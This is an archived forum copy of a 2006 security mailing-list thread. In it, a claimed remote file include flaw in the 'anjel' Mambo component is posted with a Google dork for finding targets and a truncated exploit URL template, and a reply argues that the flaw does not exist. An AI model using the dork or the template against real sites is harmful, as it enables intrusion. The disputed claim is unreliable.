|
|||||||||
|
|||||||||
| |||||||||
|
|
|
|
|||||||||||||||||||||||||||||||||
 |
|
|
«
Previous Thread
|
Next Thread
»
|
Thread Tools | Search this Thread | Display Modes |
Web Development Archives Sponsor:
|
|
|
|
#1
August 18th, 2006, 01:00 PM
|
|||
|
|||
|
anjel Mambo Component Remote File Include
!!!!!!!!!WWW.SiBERSAVASCiLAR.CM!!!!!!!!!
Title : anjel Mambo Component Remote File Include Vulnerabilities #Author: Crackers_Child #cont@ct: crackers_child (AT) sibersavascilar (DOT) com Google Dorks : inurl:"/com_anjel/" Application : anjel Component of Mambo Bug İn anjel.index.php include_once( '//globals.php' ); require_once( '//configuration.php' ); require_once( $mosConfig_absolute_path . '/includes/joomla.php' ); Exploit: http://[target]/[mambo_path]/ greets: All My Friends And SiberSavascilar.Com Members ! [ WWW.SiBERSAVASCiLAR.CM ]
|
|
#2
August 22nd, 2006, 09:00 PM
|
|||
|
|||
|
anjel Mambo Component Remote File Include
Hi,
crackers_child (AT) sibersavascilar (DOT) com schrieb am Thu, 17 Aug 2006 21:09:36 +0000: >Bug İn anjel.index.php > > include_once( '//globals.php' ); > require_once( '//configuration.php' ); > require_once( $mosConfig_absolute_path . '/includes/joomla.php' ); $mosConfig_absolute_path is set in configuration.php, there is no way to manipulate it between the two line, so there is no vulnerability. Please take a look at <> Regards Carsten -- Dipl.-Inform. Carsten Eilers IT-Sicherheit und Datenschutz <http://www.ceilers-it.de>
|
|
| Viewing: Web Development Archives > Mailing Lists > Security > anjel Mambo Component Remote File Include |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|
 |
|
|
Del.icio.us
Digg
Google
Spurl
Blink
Furl
Simpy
Y! MyWeb
Linear Mode
